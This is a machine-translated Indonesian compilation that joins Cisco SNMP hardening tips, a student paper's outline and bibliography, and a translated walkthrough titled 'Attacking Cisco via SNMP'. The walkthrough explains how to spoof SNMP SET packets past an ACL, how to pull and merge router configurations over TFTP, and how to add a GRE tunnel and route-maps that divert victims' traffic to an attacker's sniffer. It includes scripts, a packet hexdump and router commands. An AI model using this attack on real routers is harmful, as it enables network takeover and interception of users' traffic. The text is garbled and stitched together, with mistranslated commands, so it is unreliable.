Di Cisco IOS tidak mungkin untuk memilih antarmuka yang akan memproses permintaan SNMP. Pembatasan dilakukan dengan menggunakan daftar akses ( daftar kontrol akses, ACL ). Anggaplah subnet 10.0.0.0/24 akan diizinkan. Dibuat ACL:

(config)#akses-daftar 10 izin 10.0.0.0 0.0.0.255

yang kemudian diterapkan pada yang sesuai komunitas untuk SNMP v1/v2c, dalam contoh ini MaKe_It_SeCuRe dengan akses read-only:

(config)#snmp-server komunitas MaKe_It_SeCuRe RO 10

Batasan untuk cabang SNMP OID diterapkan menggunakan melihat

(konfigurasi)# tampilan server snmp IFACE 1.3.6.1.2.1. 2 termasuk

lalu ke yang dibuat pandangan melekat pada komunitas:

(config)#snmp-server community MaKe_It_SeCuRe lihat IFACES RO 10

Untuk menggunakan SNMPv3 dengan batasan-batasan yang diperlukan(otentikasi dan enkripsi, hanya baca, akses dari subnet 10.0.0.0/24 ke cabang antarmuka yang ditunjukkan di lihat IFACES) , Anda perlu membuat grup(AMAN) dengan akses read-only ke OID dari tampilan IFACES dan kebutuhan untuk otentikasi terenkripsi, menautkannya ke yang dibuat sebelumnya daftar akses 10 :

(konfigurasi)#grup snmp-server SECURE v3 priv bacaIFACEakses 10

lalu tambahkan ke grup akun pengguna(pengguna v3) dengan memberinya kata sandi untuk otentikasi dan enkripsi, serta algoritma enkripsi(dalam hal ini AES128 ):

(konfigurasi)#pengguna server snmpv3userAMAN v3 auth sha Strong_Password priv aes 128 Priv_Password

SNMP dapat digunakan untuk manajemen, dan mengatur pengaturan akses default ke tingkat keparahan sebanding dengan kata sandi yang mudah ditebak untuk masuk ke SSH. Dengan mengikuti rekomendasi dalam artikel ini, kami tidak hanya akan secara langsung melindungi diri kami sendiri dari serangan di jaringan dan server kami, tetapi kami akan membuatnya tidak mungkin menggunakan sumber daya kami untuk menyerang orang lain, dan kami juga akan meminimalkan jumlah basis untuk meneriakkan tajuk utama di media “peretas Rusia menyerang .. .”.

Secara total, Anda dapat melindungi server dan jaringan Anda dari akses tidak sah menggunakan protokol SNMP, mengurangi jumlah serangan DDoS seperti amplifikasi SNMP dan meminimalkan partisipasi segmen infrastruktur Anda di dalamnya menggunakan tindakan berikut yang tidak memerlukan investasi keuangan tambahan:

    Kontrol peralatan hanya dari segmen jaringan tepercaya. Pembatasan dengan mengikat layanan ke antarmuka tertentu, atau dengan menggunakan daftar akses.

    Mengubah nilai komunitas SNMP default (publik dan pribadi) hingga sulit ditebak.

    Batas cabang PENGENAL, tersedia untuk diterima/diubah oleh SNMP.

    Gunakan saja SNMPv 3 dengan opsi otentikasi dan enkripsi tambahan.

    Menonaktifkan layanan SNMP dengan penghapusan konfigurasi - dalam hal keputusan untuk benar-benar meninggalkan SNMP.

Dan jika setiap administrator server yang dapat diakses dari Internet melakukan ini, dunia digital akan selangkah lebih dekat menuju kesempurnaan.

ISI
PENDAHULUAN 3
1. PEMBUKTIAN TEORITIS MASALAH MEMPELAJARI METODE SERANGAN PADA PROTOKOL SNMP
1.1 PERLU MEMPELAJARI METODE SNMP 5 ATTACK
1.2 PROTOKOL SNMP : DESKRIPSI, TUJUAN 7
2. ANALISIS SERANGAN PADA PROTOKOL SNMP DAN METODE PENANGGULANGAN
2.1 TEKNIK SERANGAN SNMP DAN PENCEGAHANNYA 11
2.2 BAGAIMANA MERESPON SERANGAN SNMP 15
KESIMPULAN 20
DAFTAR SUMBER YANG DIGUNAKAN 21

Fragmen untuk ditinjau

Gambar 3 - Bentuk layar utilitas SoftPerfectNetworkScanner Jadi, jika Anda menemukan perangkat yang mendukung SNMP di jaringan Anda, ada baiknya menghubungi produsen perangkat tersebut untuk mengetahui apakah mereka telah mengembangkan tambalan yang diperlukan Menonaktifkan layanan SNMP Banyak orang berpendapat bahwa jika layanan SNMP tidak diperlukan, itu harus dinonaktifkan atau dihapus. Berikut adalah algoritma untuk menonaktifkan layanan SNMP di sistem operasi Windows: Memilih menu Mulai - Panel Kontrol - Alat Administratif - Layanan (lihat Gambar 4). Pilih layanan SNMP. Jika layanan sedang berjalan, klik tombol "Stop", lalu pilih "Jenis Startup" - "Nonaktif" bahkan ketika SNMP dinonaktifkan. Penyaringan masuk Penyaringan masuk mengandalkan konfigurasi firewall dan router untuk melakukan penyaringan masuk pada port UDP 161 dan 162. Ini akan mencegah serangan yang dimulai oleh jaringan eksternal terhadap perangkat yang rentan di jaringan lokal. Port lain yang mendukung layanan terkait SNMP, termasuk port TCP dan UDP 161, 162, 199, 391, 750, dan 1993, mungkin juga memerlukan pemfilteran jalan masuk. Pemfilteran lalu lintas keluar pada port UDP 161 dan 162 di tepi jaringan dapat mencegah sistem Anda dari digunakan sebagai batu loncatan untuk serangan Sistem Deteksi dan Pencegahan Intrusi Sistem Deteksi Intrusi (IDS) adalah perangkat lunak atau perangkat keras, yang mendeteksi peristiwa penetrasi yang tidak sah (intrusi atau serangan jaringan) ke dalam sistem komputer atau jaringan Tanpa IDS, infrastruktur menjadi tidak terpikirkan keamanan jaringan. Selain firewall yang berfungsi berdasarkan aturan keamanan, IDS memantau dan mengawasi aktivitas yang mencurigakan. Mereka memungkinkan Anda untuk mengidentifikasi pelanggar yang telah menembus di belakang firewall, dan beri tahu administrator tentang hal itu, siapa yang akan menerima solusi yang diperlukan untuk menjaga keamanan. Metode deteksi intrusi tidak menjamin keamanan lengkap Sebagai hasil dari penggunaan IDS, tujuan berikut tercapai: deteksi serangan atau intrusi jaringan; peramalan kemungkinan serangan di masa depan dan identifikasi kelemahan sistem untuk mencegah penggunaannya. Dalam banyak kasus, penyerang melakukan fase persiapan, seperti menyelidiki (memindai) jaringan atau mengujinya untuk mendeteksi kerentanan sistem; mendokumentasikan ancaman yang diketahui; memantau kualitas administrasi yang dilakukan dari sudut pandang keamanan, khususnya dalam skala besar dan jaringan yang kompleks; mendapatkan informasi berharga tentang intrusi yang telah terjadi untuk memulihkan dan mengoreksi faktor-faktor yang menyebabkan penetrasi; mengidentifikasi lokasi sumber serangan dari sudut pandang jaringan eksternal (serangan eksternal atau internal), yang memungkinkan Anda membuat keputusan yang tepat saat mengatur node jaringan. Dalam kasus umum, IDS berisi: pemantauan, yang mengumpulkan informasi tentang peristiwa yang terkait dengan keamanan jaringan atau sistem yang dilindungi; subsistem analisis yang mendeteksi tindakan mencurigakan dan serangan jaringan; a penyimpanan yang menyimpan peristiwa utama dan hasil analisis; konsol manajemen untuk mengonfigurasi IDS, memantau status sistem yang dilindungi kami dan IDS, mempelajari situasi yang terdeteksi oleh subsistem analisis Kesimpulannya, kami mencatat bahwa kesederhanaan protokol SNMP yang populer menghasilkan peningkatan kerentanan. Karena SNMP digunakan secara luas, mengeksploitasi jaringan dengan produk yang rentan dapat menjadi bencana. Oleh karena itu, untuk penggunaan protokol SNMP yang efektif, perlu diterapkan berbagai metode untuk mencegah serangan dan membangun sistem perlindungan yang komprehensif KESIMPULAN Studi ini dikhususkan untuk masalah memastikan keamanan mengatur interaksi jaringan melalui protokol SNMP. Selama pekerjaan, fitur-fitur dari protokol bernama dan kemungkinan masalah penggunaannya diidentifikasi. Untuk membuktikan masalah tersebut, data statistik disediakan yang mengkonfirmasi kemungkinan tinggi serangan jaringan. Selain itu, bagian teoretis berisi informasi tentang struktur protokol, skema permintaan/respons, dan langkah-langkah untuk mendapatkan respons terhadap permintaan. makalah dilakukan analisis kemungkinan serangan terhadap protokol SNMP, di antaranya adalah serangan Dos, serangan buffer overflow dan mengeksploitasi kerentanan. format string. Tentu saja, masih banyak lagi potensi ancaman, tetapi ulasan mereka memberikan studi yang lebih dalam dan lebih komprehensif.Untuk membangun sistem untuk melindungi interaksi jaringan pelanggan jaringan, metode dipertimbangkan untuk mencegah serangan pada protokol SNMP dan dicatat bahwa penggunaan seperangkat alat akan efektif Berdasarkan analisis, ditemukan bahwa protokol SNMP cukup rentan dan, jika keputusan dibuat untuk menggunakannya, kebijakan keamanan harus dikembangkan dan semua prinsipnya harus diikuti .Dengan demikian, dapat disimpulkan bahwa tujuan telah tercapai dan tugas yang ditetapkan dalam pendahuluan telah tercapai DAFTAR SUMBER YANG DIGUNAKAN tanggal 27 Juli 2006 N 149-FZ Tentang informasi, teknologi Informasi dan perlindungan informasi Daftar literatur khusus dan ilmiahBlank-Edelman D. Perl untuk administrasi sistem, M.: simbol-Plus, 2009.- 478s Borodakiy V.Yu. Berlatih dan prospek untuk membuat informasi yang aman dan cloud komputasi berdasarkan MSS OGV / V.Yu. Borodaki, A.Yu. Dobrodeev, P.A. Nashchekin // Masalah aktual pengembangan sistem teknologi untuk perlindungan negara, komunikasi khusus dan khusus dukungan informasi: VIII Konferensi Ilmiah Antar-Departemen Seluruh Rusia: materi dan laporan (Orel, 13-14 Februari 2013). - Jam 10, Bagian 4 / Ed. V.V. Mizerova. - Orel: Akademi Layanan Keamanan Federal Rusia, 2013. Grishina N.V. Organisasi sistem keamanan informasi terintegrasi. - M .: Helios ARV, 2009. - 256 s, Douglas R. Mauro SNMP Fundamentals, edisi ke-2 / Douglas R. Mauro, Kevin J. Schmidt - M .: Symbol-Plus, 2012.-725s Kulgin M.V. Jaringan komputer. Praktek konstruksi. Untuk para profesional, St.Petersburg: Peter, 2003.-462s.Mulyukha V.A. Metode dan sarana untuk melindungi informasi komputer. Firewall: Textbook / Mulyukha V.A., Novopashenny A.G., Podgursky Yu.E. - St.Petersburg: SPbGPU Publishing House, 2010. - 91 hal.Olifer V.G., Olifer N.P. Jaringan komputer. Prinsip, teknologi, protokol. - 4th. - St.Petersburg: Peter, 2010. -902s. Teknologi switching dan routing di lokal jaringan komputer: buku teks / SmirnovaE. V. dan lainnya; ed. A.V. Proletar. - M .: Penerbit MSTU im. T.E. Bauman, 2013. - 389 hlm. Flenov M. Linux dari sudut pandang Hacker, St.Petersburg: BHV-St.Petersburg, 2005. - 544 hlm.Horeev P.V. Metode dan sarana untuk melindungi informasi di sistem komputer. - M .: Pusat Penerbitan "Akademi", 2005. -205 p. Khoroshko V. A., Chekatkov A. A. Metode dan sarana keamanan informasi, K .: Junior, 2003. - 504 p. Sumber internet IDS / IPS - Deteksi dan pencegahan intrusi sistem [Sumber daya elektronik] URL: http://netconfig.ru/server/ids-ips/ Analisis ancaman Internet pada tahun 2014. serangan DDoS. Peretasan situs web [Sumber daya elektronik]. URL: http://onsec.ru/resources/Internet%20threats%20in%202014.%20Overview%20by%20Qrator-Wallarm.pdfKolischak A. Kerentanan format string [Sumber daya elektronik]. URL: https://securityvulns.ru/articles/fsbug.aspFirst Mile, No. 04, 2013 [Sumber elektronik]. URL: http://www.lastmile.su/journal/article/3823 Keluarga standar SNMP [Sumber daya elektronik]. URL: https://en.wikibooks.org/wiki /SNMP_Standard_FamilyForeign Literature"CERT Advisory CA-2002-03: Berbagai Kerentanan dalam Banyak Implementasi Protokol Manajemen Jaringan Sederhana (SNMP)", 12 Feb. 2002, (saat ini 11 Maret 2002)

DAFTAR SUMBER YANG DIGUNAKAN
Peraturan
1. Hukum Federal Federasi Rusia 27 Juli 2006 N 149-FZ Tentang Informasi, Teknologi Informasi dan Perlindungan Informasi
Daftar literatur khusus dan ilmiah
2. Blank-Edelman D. Perl untuk administrasi sistem, M.: Simbol plus, 2009.- 478s.
3. Borodaki V.Yu. Berlatih dan prospek untuk membuat informasi yang aman dan cloud komputasi berdasarkan MSS OGV / V.Yu. Borodaki, A.Yu. Dobrodeev, P.A. Nashchekin // Masalah aktual pengembangan sistem teknologi perlindungan negara, komunikasi khusus dan dukungan informasi khusus: VIII Konferensi Ilmiah Antardepartemen Seluruh Rusia: bahan dan laporan (Orel, 13-14 Februari 2013). - Jam 10, Bagian 4 / Ed. V.V. Mizerova. - Elang: Akademi FSO Rusia, 2013.
4. Grishina N.V. Organisasi sistem keamanan informasi yang kompleks. - M.: Helios ARV, 2009. - 256 dtk,
5. Douglas R. Mauro Dasar-dasar SNMP, edisi ke-2 / Douglas R. Mauro, Kevin J. Schmidt - M.: Symbol-Plus, 2012.-725p.
6. Kulgin M.V. Jaringan komputer. Praktek konstruksi. Untuk profesional, St. Petersburg: Peter, 2003.-462p.
7. Mulyukha V.A. Metode dan sarana untuk melindungi informasi komputer. Firewall: Textbook / Mulyukha V.A., Novopashenny A.G., Podgursky Yu.E. - St. Petersburg: SPbSPU Publishing House, 2010. - 91 hal.
8. Olifer V.G., Olifer N.P. Jaringan komputer. Prinsip, teknologi, protokol. - 4th. - St.Petersburg: Peter, 2010. -902s.
9. Teknologi switching dan routing di jaringan komputer lokal: buku teks / Smirnova E. V. dan lainnya; ed. A.V. Proletar. - M .: Penerbit MSTU im. T.E. Bauman, 2013. - 389p.
10. Flenov M. Linux dari sudut pandang Hacker, St.Petersburg: BHV-St.Petersburg, 2005. - 544 hal.
11. Khoreev P.V. Metode dan sarana perlindungan informasi dalam sistem komputer. - M.: Pusat Penerbitan "Akademi", 2005. -205 hal.
12. Khoroshko V.A., Chekatkov A.A. Metode dan sarana keamanan informasi, K .: Junior, 2003. - 504 hal.
sumber internet
13. IDS/IPS - Sistem deteksi dan pencegahan intrusi [Sumber daya elektronik] URL: http://netconfig.ru/server/ids-ips/.
14. Analisis ancaman internet tahun 2014. serangan DDoS. Peretasan situs web [Sumber daya elektronik]. URL: http://onsec.ru/resources/Internet%20threats%20in%202014.%20Overview%20by%20Qrator-Wallarm.pdf
15. Kolischak A. Kerentanan string format [Sumber daya elektronik]. URL: https://securityvulns.ru/articles/fsbug.asp
16. First Mile, No. 04, 2013 [Sumber elektronik]. URL: http://www.lastmile.su/journal/article/3823
17. Keluarga standar SNMP [Sumber daya elektronik]. URL: https://ru.wikibooks.org/wiki /SNMP_Standard_Family
Sastra asing
18. "CERT Advisory CA-2002-03: Berbagai Kerentanan dalam Banyak Implementasi Protokol Manajemen Jaringan Sederhana (SNMP)", 12 Feb. 2002, (saat ini 11 Maret 2002)

Diposting di http:// www. semua yang terbaik. en/

Diposting di http:// www. semua yang terbaik. en/

ikhtisar teknik serangan jaringan pada lapisan jaringan model OSI dan penanggulangannya

PERKENALAN

serangan jaringan virus trojan

Setiap informasi memiliki tiga sifat utama:

· Privasi.

· Integritas.

· Ketersediaan.

Jelaskan masing-masing sifat tersebut.

Informasi rahasia adalah informasi yang dimiliki, digunakan atau dibuang oleh individu individu atau badan hukum dan didistribusikan sesuai keinginan mereka sesuai dengan syarat dan ketentuannya.

Integritas informasi (integritas data) adalah istilah dalam teori ilmu komputer dan telekomunikasi, yang berarti bahwa data tersebut lengkap, kondisi bahwa data tersebut tidak diubah selama operasi apa pun padanya, baik itu transmisi, penyimpanan, atau presentasi.

Ketersediaan informasi - status informasi (sumber daya otomatis sistem Informasi) di mana subjek dengan hak akses dapat dengan bebas menggunakannya. Hak akses: hak untuk membaca, mengubah, menyalin, menghancurkan informasi, serta hak untuk mengubah, menggunakan, menghancurkan sumber daya.

Ada tiga cara utama untuk melindungi informasi, yang disusun berdasarkan kepentingannya:

· Metode organisasi perlindungan informasi. Keamanan informasi organisasi adalah permulaan organisasi, yang disebut "inti" di sistem umum perlindungan informasi rahasia perusahaan. Efektivitas fungsi sistem keamanan informasi secara keseluruhan bergantung pada kelengkapan dan kualitas solusi oleh manajemen perusahaan dan pejabat tugas organisasi. Peran dan tempat perlindungan informasi organisasi dalam keseluruhan sistem tindakan yang ditujukan untuk melindungi informasi rahasia suatu perusahaan ditentukan menjadi sangat penting bagi manajemen untuk membuat keputusan manajemen yang tepat waktu dan benar, dengan mempertimbangkan kekuatan, sarana, metode dan metode perlindungan informasi yang dimilikinya dan berdasarkan perangkat metodologi peraturan saat ini.

· Metode Teknis perlindungan informasi. Metode-metode ini mengasumsikan adanya perangkat dan sarana teknis pemrosesan informasi, sarana khusus solusi teknis memberikan perlindungan dan kontrol informasi. Dan, sebagai tambahan, metode perlindungan informasi, yaitu sekumpulan algoritme dan program yang menyediakan kontrol akses dan mengecualikan penggunaan informasi yang tidak sah.

Menyerang Cisco melalui SNMP

Alexander Antipov


Matiai Aroni dan William M. Hidalgo, diterjemahkan oleh Vladimir Kuksenok

Perkenalan

Seringkali administrator sistem tidak jelas tentang SNMP. Karena gagasan yang tidak pasti tentang tujuan protokol ini, dan karenanya, ketidaktahuan akan potensinya kemungkinan masalah, masalah keamanan sering diabaikan.

Anda mungkin terkejut saat pertama kali melihat output dari utilitas seperti SNMP-Enum Philip Waeytens yang berjalan di Windows 2000 Server dengan layanan SNMP diaktifkan. Informasi yang dikumpulkan dapat sangat membingungkan administrator sistem dan memberikan gambaran tentang kemungkinan kaya SNMP.

Fakta bahwa SNMP didasarkan pada UDP membuatnya semakin menarik. Sebagai protokol tanpa koneksi, UDP rentan terhadap serangan spoofing IP. Jika organisasi Anda memiliki router Cisco, Anda siap menjelajahi apa yang dapat Anda lakukan dengannya menggunakan SNMP.

Skenario serangan

Lihatlah contoh skenario serangan yang ditunjukkan pada Gambar 1.


Gambar 1. Contoh skenario serangan.

Biasakan diri Anda dengan skenario serangan. Di bawah ini adalah konfigurasi saat ini dari router yang diserang (Victim Router):

Konfigurasi saat ini: 1206 byte! versi 12.3! korban hostname ! aktifkan rahasia 5 $1$h2iz$DHYpcqURF0APD2aDuA.YX0 ! antarmuka Ethernet0/0 alamat ip dhcp ip nat di luar setengah dupleks ! antarmuka Ethernet0/1 alamat ip 192.168.1.1 255.255.255.0 ip nat di dalam setengah dupleks ! jaringan rip router 192.168.1.0 ! ip nat di dalam daftar sumber 102 interface Ethernet0/0 overload no ip http server ip classless ! daftar akses 1 izin 192.168.1.0 0.0.0.255 daftar akses 102 izin ip apa saja ! snmp-server komunitas RO publik komunitas snmp-server pribadi RW 1 snmp-server mengaktifkan perangkap tty ! baris con 0 login login sinkron baris aux 0 baris vty 0 4 login rahasia kata sandi ! ! akhir

Perhatikan aturan akses untuk grup RW. Aturan ini mencoba membatasi akses baca/tulis SNMP hanya untuk pengguna di jaringan lokal (192.168.1.0).

Ada dua tahap utama serangan:

  1. Abaikan aturan akses SNMP pada router yang diserang untuk mendapatkan akses ke file konfigurasi router.
  2. Pembuatan terowongan GRE antara router yang diserang dan router peretas untuk mencegat lalu lintas yang diserang dari jarak jauh mesin klien(Klien Korban).

Teori

Seperti disebutkan dalam artikel "Memanfaatkan Router Cisco, Bagian 1", dengan menggunakan perintah SNMP SET, Anda dapat memaksa router Cisco untuk mengganti/mengirim file konfigurasinya menggunakan TFTP.

Dengan mengirimkan permintaan SET SNMP dengan alamat IP palsu (dari rentang yang dijelaskan dalam RFC1918 - 192.168.1.0), kita harus memaksa router yang diserang untuk mengirimkan file konfigurasinya kepada kita. Ini mengasumsikan bahwa kita mengetahui 'string komunitas pribadi' dan ACL yang dijelaskan dalam string konfigurasi grup RW.

Abaikan Aturan Akses SNMP

Mari kita mulai dengan membuat permintaan SNMP palsu. Menggunakan skrip Perl kecil dan Ethereal, kami akan mencegat permintaan "copy config" SNMP SET standar, yang akan kami gunakan sebagai paket dasar kami. [email dilindungi]# ./copy-router-config.pl ####################################### # ############# # Salin konfigurasi Router Cisco - Menggunakan SNMP # Diretas oleh muts - [email dilindungi]################################################## # ##### Penggunaan: ./cisco-copy-config.pl Pastikan server TFTP sudah diatur, sebaiknya dijalankan dari /tmp ! [email dilindungi]# Setelah mengeksekusi skrip, paket SNMP yang mirip dengan yang ditunjukkan pada Gambar 2 akan dicegat.Seperti yang diharapkan, permintaan ini ditolak oleh router dan file konfigurasi tidak dikirim.


Gambar 2. Paket SNMP yang diambil.

Perhatikan alamat IP penyerang (80.179.76.227). Sekarang, dengan menggunakan editor hex, kami akan mengubah alamat IP ini dan beberapa bidang lain di header paket. Dalam notasi heksadesimal, alamat IP palsu 192.168.1.5 terlihat seperti C0 A8 01 05, yang ditunjukkan pada Gambar 3.




Gambar 3. Mengubah alamat IP terbalik dari sebuah paket.

Kami kemudian akan mengirimkan paket menggunakan file2cable (atau generator paket lainnya):

[email dilindungi]:~# file2cable -v -i eth0 -f /root/snmp-mod file2cable - oleh FX Thanx buka Lamont Granquist & fyodor untuk hexdump() /root/snmp-mod mereka - 238 byte data mentah 000f 347c 501f 0006 1bcc 00fa 0800 4500 ..4|P........E. 00e0 0000 4000 4011 35bd c0a8 0105 d4c7 [email dilindungi]@.5....... 91f2 8000 00a1 00cc 052e 3081 c102 0100 ..........0..... 0407 7072 6976 6174 65a3 81b2 0203 00d6 ..pribadi..... .. 9b02 0100 0201 0030 81a4 3016 0611 2b06 .......0..0...+. 0104 0109 0960 0101 0101 0283 f1b0 7802 .....`........x. 0101 3016 0611 2b06 0104 0109 0960 0101 ..0...+......`.. 0101 0383 f1b0 7802 0104 3016 0611 2b06 ......x...0...+. 0104 0109 0960 0101 0101 0483 f1b0 7802 .....`........x. 0101 3019 0611 2b06 0104 0109 0960 0101 ..0...+......`.. 0101 0583 f1b0 7840 0450 b34c e330 2706 [email dilindungi]".112b 0601 0401 0909 6001 0101 0106 83f1 .+......`...... b078 0412 7077 6e64 2d72 6f75 7465 722e .x..pwnd-router. 636f 6e66 6964 3016 0611 konfigurasi0... +..... 0960 0101 0101 0e83 f1b0 7802 0104 .`........x... Panjang paket: 238 [email dilindungi]:~# Setelah itu, server TFTP kami akan menerima koneksi yang log Etherealnya ditunjukkan pada Gambar 4.


Gambar 4. Koneksi server TFTP dicegat oleh Ethereal.

Catat alamat IP terbalik dari paket SNMP dan permintaan tulis TFTP (paket 1 dan 2). Paket melewati aturan akses SNMP, dan kami mendapatkan file konfigurasi router yang diserang melalui TFTP.

Terowongan GRE

GRE (Generic Routing Encapsulation) adalah protokol tunneling yang dirancang untuk merangkum jenis paket lapisan jaringan yang sewenang-wenang dalam paket lapisan jaringan. Salah satu opsi untuk menggunakan GRE adalah menghubungkan segmen jaringan IPX melalui saluran komunikasi yang hanya mendukung lapisan jaringan model OSI. Dalam hal ini, Anda perlu membuat terowongan GRE dari satu perute ke perute lain untuk mengirim paket IPX bolak-balik melalui tautan khusus IP.

Namun, kami akan menggunakan GRE untuk tujuan selain tujuan biasanya. Rencana kami adalah sebagai berikut:

  • Buat terowongan GRE dari router yang diserang ke router peretas.
  • Tentukan lalu lintas apa yang akan melewati terowongan.
  • Buka paket paket GRE yang datang dari router yang diserang dan teruskan ke komputer penyerang (sniffer) untuk dianalisis.

Perute yang diserang

Kita perlu membuat terowongan GRE di router yang diserang. Karena kami tidak memiliki akses ke terminal (konsol), kami cukup mengedit file konfigurasi yang dihasilkan dan mengirimkannya kembali ke router menggunakan permintaan SET SNMP palsu. Tambahkan baris berikut ke file konfigurasi router yang diserang: interface tunnel0 ip address 192.168.10.1 255.255.255.0 tunnel source Ethernet0/0 tunnel destination tunnel mode gre ip Artinya sebagai berikut:
  • Kami telah membuat antarmuka tunnel0 dan menentukan alamat IP dari jaringan 192.168.10.x. Untuk berkomunikasi, kedua ujung terowongan harus berada di subnet yang sama.
  • Kami telah menunjukkan bahwa antarmuka Ethernet0/0 adalah awal dari terowongan (jika tidak, dari mana terowongan dapat dimulai?)
  • Ujung terowongan adalah alamat IP antarmuka eksternal router peretas.
  • Perintah terakhir adalah opsional, karena terowongan GRE dibuat secara default (tetapi kami masih menambahkannya untuk memastikan).
Sekarang kita dapat mengonfigurasi daftar akses untuk menentukan jenis lalu lintas yang melewati terowongan dan peta perutean (rute-maps) yang diperlukan untuk mengalihkan lalu lintas.

Untuk melakukan ini, tambahkan beberapa baris lagi ke file konfigurasi router yang diserang:

Daftar akses 101 mengizinkan tcp sembarang eq 443 daftar akses 101 mengizinkan tcp sembarang persamaan 80 daftar akses 101 mengizinkan tcp sembarang persamaan 21 daftar akses 101 mengizinkan tcp sembarang persamaan 20 daftar akses 101 mengizinkan tcp sembarang persamaan 23 daftar akses 101 mengizinkan tcp apa saja eq 25 daftar akses 101 mengizinkan tcp apa saja eq 110 Kami telah mengizinkan transfer data melalui protokol SSL, HTTP, FTP, telnet, SMTP dan POP3.

Sekarang, jika lalu lintas cocok dengan aturan yang dijelaskan di atas, itu akan dialihkan sesuai dengan peta perutean, yang deskripsinya perlu ditambahkan ke file konfigurasi:

Router-map pengalihan-traffic cocok dengan alamat ip 101 atur ip next-hop 192.168.10.2 interface Ethernet0/0 ip policy route-map pengalihan-traffic Entri ini memiliki arti sebagai berikut:

  • Kami menentukan nama peta perutean (divert-traffic) dan kemudian menggunakan perintah 'match' untuk menentukan bahwa set aturan akses 101 (daftar akses) harus digunakan sebagai kondisi pencocokan.
  • Kami menentukan alamat IP penyerang sebagai alamat hop berikutnya.
  • Kami menerapkan peta perutean ke antarmuka LAN eksternal dari mesin yang diserang. Hasilnya akan memantau semua lalu lintas Ethernet0/0 masuk dan keluar.

router peretas

Konfigurasi router penyerang sedikit lebih rumit, karena kita harus menentukan dua peta perutean - satu untuk meneruskan lalu lintas ke komputer penyerang (sniffer), dan yang lainnya untuk mengirim kembali lalu lintas ke router yang diserang. Sangat penting bagi kami untuk mengirimkan kembali data yang di-tunnel ke router yang diserang agar komputer yang diserang (Klien Korban) tidak kehilangan koneksi.

Mari kita mulai dengan membuat terowongan GRE pada router penyerang: Penyerang(config)# terowongan antarmuka0 Penyerang(config-if)# alamat ip 192.168.10.2 255.255.255.0 Penyerang(config-if)# sumber terowongan Ethernet0/0 Penyerang(config- jika)# tujuan terowongan Penyerang(config-jika)# mode terowongan gre ip Penyerang(config)# daftar akses 101 mengizinkan ip penyerang apa saja(config)# router-peta mengalihkan-ke-sniffer Penyerang(config-route-map) # sesuaikan alamat ip 101 Penyerang(config-route-map)# atur ip next-hop 192.168.3.5 Penyerang(config-route-map)# keluar Penyerang(config)# terowongan antarmuka0 Penyerang(config-if)# rute kebijakan ip- map divert-to-sniffer Aturan-aturan ini berarti sebagai berikut:

  • Kami telah membuat aturan akses yang mengizinkan semua jenis lalu lintas.
  • Kami telah membuat peta perutean alih-ke-sniffer (peta perutean ini akan mengalihkan lalu lintas terowongan ke pelacak).
  • Aturan akses yang dibuat digunakan sebagai kondisi pencocokan.
  • Kami menentukan alamat IP penyerang (sniffer) sebagai alamat hop berikutnya.
  • Kami telah menerapkan peta perutean ke antarmuka tunnel0.
Sangat penting bagi kami untuk menggunakan peta perutean untuk mengarahkan ulang data. Router menerima data terowongan yang dienkapsulasi dalam paket GRE, dan tanpa mendekode paket, kita tidak dapat melihatnya. Dengan meneruskan paket yang diterima ke penyerang (sniffer), router mengirimkannya sebagai paket IP biasa tanpa enkapsulasi GRE.

Terakhir, mari buat peta perutean dan kaitkan dengan antarmuka Ethernet0/0:

Attacker(config-if)# route-map divert-out Attacker(config-route-map)# mencocokkan alamat ip 101 Attacker(config-route-map)# set ip next-hop 192.168.10.1 Attacker(config-route-map )# keluar Penyerang(config)# antarmuka ethernet0/0 Penyerang(config-if)# kebijakan ip rute-peta dialihkan-keluar Ini pengaturan tambahan berarti sebagai berikut:

  • Setelah penyerang (sniffer) mencegat dan meneruskan kembali data yang di-tunnel, peta perutean pengalihan akan mengalihkan lalu lintas kembali ke router yang diserang.
  • Kami telah menerapkan peta perutean ke antarmuka Ethernet.

Penyerang (pengendus)

Setelah mengonfigurasi router, kita perlu mengonfigurasi komputer penyerang (sniffer) untuk mencegat dan mengalihkan data. Penting agar komputer dikonfigurasikan untuk membalikkan penerusan paket. Untuk melakukan ini, Anda dapat menggunakan salah satu dari perintah berikut: [email dilindungi]:~# echo 1 > /proc/sys/net/ipv4/ip_forward atau [email dilindungi]:~# fragrouter -B1 Tanpa pengalihan, serangan kami akan menyebabkan penolakan layanan (DoS) pada komputer yang diserang dan karenanya tidak akan berarti.

Mari kita mulai serangannya

Setelah semua pengaturan selesai, yang tersisa untuk kita lakukan adalah mengunggah file konfigurasi baru yang dimodifikasi ke router yang diserang. Hasilnya adalah aktivasi terowongan GRE dan pengalihan semua lalu lintas dari jaringan lokal komputer yang diserang ke peretas (sniffer).

Kita perlu membuat permintaan SET SNMP palsu, yang akan menyebabkan router mengunduh file konfigurasi baru dan menambahkannya ke konfigurasi saat ini. Untuk mendapatkan paket dasar, kami akan mengirimkan permintaan yang biasa lagi:

[email dilindungi]# ./merge-router-config.pl ####################################### # ############# # Menggabungkan konfigurasi Router Cisco - Menggunakan SNMP # Diretas oleh muts - [email dilindungi]################################################## # ##### Penggunaan: ./merge-copy-config.pl Pastikan server TFTP sudah diatur, sebaiknya dijalankan dari /tmp ! [email dilindungi]# Tangkap paket ini dan ubah alamat IP pengirim dan beberapa bidang header paket lainnya seperti yang ditunjukkan pada Gambar 5.


Gambar 5. Mengubah header paket.

Setelah mengirimkan paket yang dimodifikasi, koneksi TFTP akan dibuat dengan komputer kita (Gambar 6).



Gambar 6. Menghubungkan ke server TFTP penyerang.

Perhatikan permintaan baca TFTP (paket #2). Paket melewati aturan akses SNMP, akibatnya file konfigurasi baru yang dimodifikasi dimuat dan ditambahkan ke konfigurasi saat ini. Informasi debug dari router yang diserang memberikan banyak informasi menarik tentang jalannya serangan:

*1 Mar 00:32:53.854: SNMP: Tetapkan permintaan, reqid 36323, errstat 0, erridx 0 .76.227 (alamat server TFTP) ccCopyTable.1.6.12285992 = pwnd-router.config ccCopyTable.1.14.12285992 = 4 *1 Mar 00:32:53.971: SNMP: Response, reqid 36323, errstat 0, erridx 0 ccCopyTable .1.2.12285992 = 1 ccCopyTable.1.3.12285992 = 4 ccCopyTable.1.4.12285992 = 1 ccCopyTable.1.592.122859 76.227 (alamat server TFTP) 1.14.12285992 = 4 *1 Mar 00:32:54.291: SNMP: Paket dikirim melalui UDP ke 192.168.1.5 Perhatikan bahwa alamat server TFTP berbeda dari alamat IP penyerang dan diteruskan sebagai parameter terpisah. Terowongan sekarang terbuka, siap digunakan, dan dapat direpresentasikan sebagai diagram pada Gambar 7.


Gambar 7. Terowongan GRE.

